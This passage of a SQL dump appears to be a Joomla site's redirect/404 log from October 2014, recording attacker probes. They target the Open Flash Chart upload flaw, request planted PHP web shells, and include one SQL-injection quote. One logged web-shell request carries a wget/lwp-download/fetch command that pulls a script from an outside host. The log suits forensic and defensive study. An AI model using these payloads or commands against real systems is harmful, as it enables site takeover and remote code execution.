00:00:00',301),(6125,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',11,0,'2014-10-10 09:28:36','0000-00-00 00:00:00',301),(6126,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',11,0,'2014-10-10 09:28:36','0000-00-00 00:00:00',301),(6127,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',11,0,'2014-10-10 09:28:37','0000-00-00 00:00:00',301),(6128,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',11,0,'2014-10-10 09:28:37','0000-00-00 00:00:00',301),(6129,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',10,0,'2014-10-10 09:28:38','0000-00-00 00:00:00',301),(6130,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',11,0,'2014-10-10 09:28:38','0000-00-00 00:00:00',301),(6131,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',11,0,'2014-10-10 09:28:39','0000-00-00 00:00:00',301),(6132,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',11,0,'2014-10-10 09:28:39','0000-00-00 00:00:00',301),(6133,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',11,0,'2014-10-10 09:28:40','0000-00-00 00:00:00',301),(6134,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',11,0,'2014-10-10 09:28:40','0000-00-00 00:00:00',301),(6135,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',11,0,'2014-10-10 09:28:40','0000-00-00 00:00:00',301),(6136,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',11,0,'2014-10-10 09:28:41','0000-00-00 00:00:00',301),(6137,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',11,0,'2014-10-10 09:28:41','0000-00-00 00:00:00',301),(6138,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',11,0,'2014-10-10 09:28:42','0000-00-00 00:00:00',301),(6139,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',11,0,'2014-10-10 09:28:42','0000-00-00 00:00:00',301),(6140,'http://3s-technologies.com.tr//index.php?option=com_jdownloads&Itemid=0&view=upload','','','',40,0,'2014-10-10 13:05:19','0000-00-00 00:00:00',301),(6141,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/images/stories/food.php?rf','','','',1,0,'2014-10-10 14:34:28','0000-00-00 00:00:00',301),(6142,'http://www.3s-technologies.com.tr/index.php/home-page','','','',1,0,'2014-10-12 02:15:47','0000-00-00 00:00:00',301),(6143,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156','','','',1,0,'2014-10-12 03:29:15','0000-00-00 00:00:00',301),(6144,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=154&Itemid=156','','','',1,0,'2014-10-12 04:21:52','0000-00-00 00:00:00',301),(6145,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/images/stories/food.php?rf','','','',1,0,'2014-10-12 11:50:24','0000-00-00 00:00:00',301),(6146,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',3,0,'2014-10-12 20:53:22','0000-00-00 00:00:00',301),(6147,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=1&layout=blog&lang=tr&limitstart=5&Itemid=0','','','',1,0,'2014-10-13 06:16:42','0000-00-00 00:00:00',301),(6148,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','https://www.google.com.tr/','',2,0,'2014-10-13 14:02:09','0000-00-00 00:00:00',301),(6149,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/images/stories/petx.php','','','',1,0,'2014-10-13 14:34:10','0000-00-00 00:00:00',301),(6150,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic//images/stories/petx.php?cmd=wget http://visionafricamagazine.com/scripts/x.log;lwp-download http://visionafricamagazine.com/scripts/x.log;fetch http://visionafricamag','','','',1,0,'2014-10-13 14:34:11','0000-00-00 00:00:00',301),(6151,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/images/stories/adminx.gif','','','',1,0,'2014-10-13 14:34:20','0000-00-00 00:00:00',301),(6152,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',1,0,'2014-10-13 15:19:33','0000-00-00 00:00:00',301),(6153,'http://www.3s-technologies.com.tr/index.php/contacts','','','',1,0,'2014-10-14 23:06:56','0000-00-00 00:00:00',301),(6154,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/article-category-list/images/stories/food.php?rf','','','',1,0,'2014-10-15 08:15:07','0000-00-00 00:00:00',301),(6155,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',2,0,'2014-10-15 10:25:00','0000-00-00 00:00:00',301),(6156,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',12,0,'2014-10-15 10:25:03','0000-00-00 00:00:00',301),(6157,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',2,0,'2014-10-15 10:24:58','0000-00-00 00:00:00',301),(6158,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',12,0,'2014-10-15 10:24:59','0000-00-00 00:00:00',301),(6159,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',12,0,'2014-10-15 10:25:03','0000-00-00 00:00:00',301),(6160,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',12,0,'2014-10-15 10:24:58','0000-00-00 00:00:00',301),(6161,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',2,0,'2014-10-15 10:25:01','0000-00-00 00:00:00',301),(6162,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-10-15 10:25:03','0000-00-00 00:00:00',301),(6163,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',2,0,'2014-10-15 10:25:09','0000-00-00 00:00:00',301),(6164,'http://www.3s-technologies.com.tr/index.php/en/wp-content/plugins/wp-slimstat-ex/lib/ofc/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-10-15 10:25:39','0000-00-00 00:00:00',301),(6165,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',2,0,'2014-10-15 10:25:40','0000-00-00 00:00:00',301),(6166,'http://www.3s-technologies.com.tr/index.php/en/wp-content/plugins/wp-slimstat-ex/lib/ofc/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',2,0,'2014-10-15 10:26:10','0000-00-00 00:00:00',301),(6167,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',12,0,'2014-10-15 10:26:12','0000-00-00 00:00:00',301),(6168,'http://www.3s-technologies.com.tr/index.php/en/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-10-15 10:26:10','0000-00-00 00:00:00',301),(6169,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',2,0,'2014-10-15 10:26:15','0000-00-00 00:00:00',301),(6170,'http://www.3s-technologies.com.tr/index.php/en/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',2,0,'2014-10-15 10:26:23','0000-00-00 00:00:00',301),(6171,'http://www.3s-technologies.com.tr/index.php/en/library/openflashchart/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',2,0,'2014-10-15 10:26:29','0000-00-00 00:00:00',301),(6172,'http://www.3s-technologies.com.tr/index.php/en/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-10-15 10:26:31','0000-00-00 00:00:00',301),(6173,'http://www.3s-technologies.com.tr/index.php/en/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',2,0,'2014-10-15 10:26:39','0000-00-00 00:00:00',301),(6174,'http://www.3s-technologies.com.tr/index.php/en/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',12,0,'2014-10-15 10:26:42','0000-00-00 00:00:00',301),(6175,'http://www.3s-technologies.com.tr/index.php/en/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',2,0,'2014-10-15 10:26:55','0000-00-00 00:00:00',301),(6176,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',12,0,'2014-10-15 10:27:12','0000-00-00 00:00:00',301),(6177,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',2,0,'2014-10-15 10:27:13','0000-00-00 00:00:00',301),(6178,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',1,0,'2014-10-15 19:15:21','0000-00-00 00:00:00',301),(6179,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',2,0,'2014-10-15 19:43:30','0000-00-00 00:00:00',301),(6180,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/modules/display-modules//images/stories/readx.gif','','','',1,0,'2014-10-16 08:18:45','0000-00-00 00:00:00',301),(6181,'http://3s-technologies.com.tr/index.php?option=com_user&view=register','','http://3s-technologies.com.tr/index.php?option=com_user&view=register','',34,0,'2014-10-16 08:30:41','0000-00-00 00:00:00',301),(6182,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/homepage2/81-english-uk/','','','',4,0,'2014-10-16 13:37:02','0000-00-00 00:00:00',301),(6183,'http://www.3s-technologies.com.tr/index.php?option=com_community&view=frontpage&141016-172605','','','',1,0,'2014-10-17 00:26:04','0000-00-00 00:00:00',301),(6184,'http://www.3s-technologies.com.tr/index.php?141016-172606','','','',1,0,'2014-10-17 00:26:05','0000-00-00 00:00:00',301),(6185,'http://www.3s-technologies.com.tr/index.php?option=com_jdownloads&Itemid=101&view=upload&141016-172608','','','',1,0,'2014-10-17 00:26:07','0000-00-00 00:00:00',301),(6186,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/images/stories/petx.php?baca','','','',1,0,'2014-10-17 21:05:00','0000-00-00 00:00:00',301),(6187,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/images/stories/explore.php?baca','','','',1,0,'2014-10-17 21:05:04','0000-00-00 00:00:00',301),(6188,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/images/stories/magic.php.png','','','',1,0,'2014-10-17 21:05:25','0000-00-00 00:00:00',301),(6189,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/images/stories/magic.php.png?baca','','','',1,0,'2014-10-17 21:05:25','0000-00-00 00:00:00',301),(6190,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153','','','',2,0,'2014-10-18 00:59:22','0000-00-00 00:00:00',301),(6191,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162','','','',3,0,'2014-10-18 01:53:19','0000-00-00 00:00:00',301),(6192,'http://3s-technologies.com.tr/index.php/en/?Itemid=139&id=137&lang=en&option=com_content&view=article','','','',8,0,'2014-10-18 10:52:47','0000-00-00 00:00:00',301),(6193,'http://3s-technologies.com.tr/index.php/en/?Itemid=129&catid=54:pcb-ve-stensil-temizleme-makineleri&id=122:stencilwasher-eco&lang=en&option=com_content&view=article','','','',6,0,'2014-10-19 04:34:29','0000-00-00 00:00:00',301),(6194,'http://3s-technologies.com.tr/index.php/en/?Itemid=137&id=56:rework-stasyonlari&lang=en&layout=default&option=com_content&view=category','','','',10,0,'2014-10-19 04:42:42','0000-00-00 00:00:00',301),(6195,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',3,0,'2014-10-20 00:10:21','0000-00-00 00:00:00',301),(6196,'http://3s-technologies.com.tr/index.php/en/?Itemid=164&catid=60:ikinciel&id=175:rh2&lang=en&option=com_content&view=article','','','',6,0,'2014-10-20 13:38:25','0000-00-00 00:00:00',301),(6197,'http://3s-technologies.com.tr/index.php/en/?Itemid=160&id=164&lang=en&option=com_content&view=article','','','',8,0,'2014-10-20 19:46:06','0000-00-00 00:00:00',301),(6198,'http://www.3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2014-10-20 22:56:20','0000-00-00 00:00:00',301),(6199,'http://3s-technologies.com.tr/index.php/en/?Itemid=146&catid=57:screen-printer&id=147:sp18p-l-screen-printer&lang=tr&option=com_content&view=article','','','',6,0,'2014-10-21 12:38:23','0000-00-00 00:00:00',301),(6200,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/images/stories/food.php','','','',1,0,'2014-10-21 14:40:23','0000-00-00 00:00:00',301),(6201,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-category-list/images/stories/petx.gif','','','',1,0,'2014-10-21 14:40:35','0000-00-00 00:00:00',301),(6202,'http://3s-technologies.com.tr/index.php/en/?Itemid=118&catid=40:temizleme&id=107:yuksek-guclu-flux-giderici-frc&lang=en&option=com_content&view=article','','','',6,0,'2014-10-21 17:46:26','0000-00-00 00:00:00',301),(6203,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109','','','',1,0,'2014-10-21 18:33:33','0000-00-00 00:00:00',301),(6204,'http://3s-technologies.com.tr/index.php/en/?Itemid=96&id=84&lang=en&option=com_content&view=article','','','',3,0,'2014-10-21 19:18:32','0000-00-00 00:00:00',301),(6205,'http://3s-technologies.com.tr/index.php/en/?Itemid=144&catid=44:pota&id=166:lfs-1&lang=tr&option=com_content&view=article','','','',8,0,'2014-10-22 00:48:17','0000-00-00 00:00:00',301),(6206,'http://3s-technologies.com.tr/index.php/en/?Itemid=164&id=60:ikinciel&lang=en&layout=default&option=com_content&view=category','','','',10,0,'2014-10-22 04:30:52','0000-00-00 00:00:00',301),(6207,'http://3s-technologies.com.tr/index.php/en/?Itemid=150&catid=58:dusuk-hizli-smd-dizgi&id=149:cs40&lang=en&option=com_content&view=article','','','',6,0,'2014-10-22 06:56:51','0000-00-00 00:00:00',301),(6208,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',1,0,'2014-10-22 12:48:30','0000-00-00 00:00:00',301),(6209,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-category-list//images/stories/food.gif','','','',1,0,'2014-10-22 17:11:05','0000-00-00 00:00:00',301),(6210,'http://www.3s-technologies.com.tr/index.php/en/?id=51&Itemid=92&lang=tr&option=com_content&view=category','','','',1,0,'2014-10-22 22:48:14','0000-00-00 00:00:00',301),(6211,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/categories.php?id=\'','','','',1,0,'2014-10-23 04:38:38','0000-00-00 00:00:00',301),(6212,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',3,0,'2014-10-23 08:33:11','0000-00-00 00:00:00',301),(6213,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',4,0,'2014-10-23 10:36:16','0000-00-00 00:00:00',301),(6214,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',18,0,'2014-10-23 11:46:03','0000-00-00 00:00:00',301),(6215,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/welcome.html','','','',5,0,'2014-10-24 09:00:15','0000-00-00 00:00:00',301),(6216,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',10,0,'2014-10-24 10:34:00','0000-00-00 00:00:00',301),(6217,'http://www.3s-technologies.com.tr/index.php/en/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',10,0,'2014-10-24 10:34:00','0000-00-00 00:00:00',301),(6218,'http://www.3s-technologies.com.tr/index.php/en/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',10,0,'2014-10-24 10:34:01','0000-00-00 00:00:00',301),(6219,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',10,0,'2014-10-24 10:34:02','0000-00-00 00:00:00',301),(6220,'http://www.3s-technologies.com.tr/index.php/en/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',10,0,'2014-10-24 10:34:03','0000-00-00 00:00:00',301),(6221,'http://www.3s-technologies.com.tr/index.php/en/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',10,0,'2014-10-24 10:34:03','0000-00-00 00:00:00',301),(6222,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',10,0,'2014-10-24 10:34:04','0000-00-00 00:00:00',301),(6223,'http://www.3s-technologies.com.tr/index.php/en/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',10,0,'2014-10-24 10:34:04','0000-00-00 00:00:00',301),(6224,'http://www.3s-technologies.com.tr/index.php/en/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',10,0,'2014-10-24 10:34:05','0000-00-00 00:00:00',301),(6225,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',10,0,'2014-10-24 10:34:06','0000-00-00 00:00:00',301),(6226,'http://www.3s-technologies.com.tr/index.php/en/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',10,0,'2014-10-24 10:34:06','0000-00-00 00:00:00',301),(6227,'http://www.3s-technologies.com.tr/index.php/en/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',10,0,'2014-10-24 10:34:07','0000-00-00 00:00:00',301),(6228,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',10,0,'2014-10-24 10:34:08','0000-00-00 00:00:00',301),(6229,'http://www.3s-technologies.com.tr/index.php/en/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',10,0,'2014-10-24 10:34:08','0000-00-00 00:00:00',301),(6230,'http://www.3s-technologies.com.tr/index.php/en/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',10,0,'2014-10-24 10:34:08','0000-00-00 00:00:00',301),(6231,'http://www.3s-technologies.com.tr/index.php/en/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',10,0,'2014-10-24 10:34:14','0000-00-00 00:00:00',301),(6232,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',10,0,'2014-10-24 10:34:15','0000-00-00 00:00:00',301),(6233,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/tr/ana-sayfa','','','',2,0,'2014-10-25 08:24:35','0000-00-00 00:00:00',301),(6234,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions//images/stories/food.gif','','','',1,0,'2014-10-25 09:40:56','0000-00-00 00:00:00',301),(6235,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/contacts','','','',2,0,'2014-10-25 10:42:17','0000-00-00 00:00:00',301),(6236,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=petx.php','','','',1,0,'2014-10-26 04:13:26','0000-00-00 00:00:00',301),(6237,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=cpx.php','','','',1,0,'2014-10-26 04:13:32','0000-00-00 00:00:00',301),(6238,'http://www.3s-technologies.com.tr/index.php/tr/anasayfa2/80-turkish-tr/','','','',3,0,'2014-10-26 10:50:46','0000-00-00 00:00:00',301),(6239,'http://www.3s-technologies.com.tr/index.php/en/images/stories/petx.php?baca?bajak','','','',1,0,'2014-10-27 02:47:48','0000-00-00 00:00:00',301),(6240,'http://www.3s-technologies.com.tr/index.php/en/images/stories/explore.php?baca?bajak','','','',1,0,'2014-10-27 02:47:52','0000-00-00 00:00:00',301),(6241,'http://www.3s-technologies.com.tr/index.php/en/images/stories/wawalo.php.png','','','',1,0,'2014-10-27 02:48:14','0000-00-00 00:00:00',301),(6242,'http://www.3s-technologies.com.tr/index.php/en/images/stories/wawalo.php.png?baca','','','',1,0,'2014-10-27 02:48:16','0000-00-00 00:00:00',301),(6243,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/plugins&amp;sa=U&amp;ei=ifVNVNHxNMOHPfGIgcgH&amp;ved=0CB4QFjACOMgB&amp;usg=AFQjCNFjOE9r0LLh1OdhFHYMOO68c1EnGQ//images/stories/ViAr.php?rf','','','',1,0,'2014-10-27 07:35:28','0000-00-00 00:00:00',301),(6244,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/plugins&amp;sa=U&amp;ei=lPVNVNGMI-uu7Aag24CoAg&amp;ved=0CCgQFjAEOMgB&amp;usg=AFQjCNEShkHbdxnCpRKGcNj4TBti75ZlNg//images/stories/ViAr.php?rf','','','',1,0,'2014-10-27 07:35:29','0000-00-00 00:00:00',301),(6245,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions//images/stories/ViAr.php?rf','','','',1,0,'2014-10-27 07:35:29','0000-00-00 00:00:00',301),(6246,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/plugins&amp;sa=U&amp;ei=ifVNVNHxNMOHPfGIgcgH&amp;ved=0CB4QFjACOMgB&amp;usg=AFQjCNFjOE9r0LLh1OdhFHYMOO68c1EnGQ/images/stories/food/tmp.php?clone','','','',1,0,'2014-10-27 07:35:34','0000-00-00 00:00:00',301),(6247,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/plugins&amp;sa=U&amp;ei=n_VNVP-_McHN7Qbq-oHYAg&amp;ved=0CFoQFjAOOMgB&amp;usg=AFQjCNG0A3fk1Eup4amxN5PotF-cZPh7Rg//images/stories/ViAr.php?rf','','','',1,0,'2014-10-27 07:35:34','0000-00-00 00:00:00',301),(6248,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/plugins&amp;sa=U&amp;ei=lPVNVNGMI-uu7Aag24CoAg&amp;ved=0CCgQFjAEOMgB&amp;usg=AFQjCNEShkHbdxnCpRKGcNj4TBti75ZlNg/images/stories/food/tmp.php?clone','','','',1,0,'2014-10-27 07:35:35','0000-00-00 00:00:00',301),(6249,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/images/stories/food/tmp.php?clone','','','',1,0,'2014-10-27 07:35:35','0000-00-00 00:00:00',301),(6250,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/plugins&amp;sa=U&amp;ei=n_VNVP-_McHN7Qbq-oHYAg&amp;ved=0CFoQFjAOOMgB&amp;usg=AFQjCNG0A3fk1Eup4amxN5PotF-cZPh7Rg/images/stories/food/tmp.php?clone','','','',1,0,'2014-10-27 07:35:35','0000-00-00 00:00:00',301),(6251,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',1,0,'2014-10-27 12:49:44','0000-00-00 00:00:00',301),(6252,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions//images/stories/barner.gif','','','',2,0,'2014-10-27 16:14:49','0000-00-00 00:00:00',301),(6253,'http://www.3s-technologies.com.tr/index.php/en/images/stories/wawalo.gif','','','',3,0,'2014-10-27 23:24:07','0000-00-00 00:00:00',301),(6254,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/article-categories//images/stories/explore.gif','','','',1,0,'2014-10-28 07:55:42','0000-00-00 00:00:00',301),(6255,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/users-component/index.php?option=com_user&view=register','','http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/users-component/index.php?option=com_user&view','',1,0,'2014-10-28 17:06:15','0000-00-00 00:00:00',301),(6256,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/index.php?option=com_user&view=register','','http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/index.php?option=com_user&view=register','',1,0,'2014-10-28 17:06:16','0000-00-00 00:00:00',301),(6257,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/users-component/index.php?option=com_user&view=register','','http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/users-component/index.php?option=com_user&view=reg','',1,0,'2014-10-28 17:06:18','0000-00-00 00:00:00',301),(6258,'http://3s-technologies.com.tr/index.php/tr/using-joomla/extensions/index.php?option=com_user&view=register','','http://3s-technologies.com.tr/index.php/tr/using-joomla/extensions/index.php?option=com_user&view=register','',1,0,'2014-10-28 17:06:18','0000-00-00 00:00:00',301),(6259,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104','','','',3,0,'2014-10-28 21:50:45','0000-00-00 00:00:00',301),(6260,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=guys.php','','','',2,0,'2014-10-29 13:36:18','0000-00-00 00:00:00',301),(6261,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories//components/com_jnews/includes/openflashchart/tmp-upload-images/guys.php?rf','','','',2,0,'2014-10-29 13:36:19','0000-00-00 00:00:00',301),(6262,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/images/stories/petx.php?baca','','','',2,0,'2014-10-29 16:15:06','0000-00-00 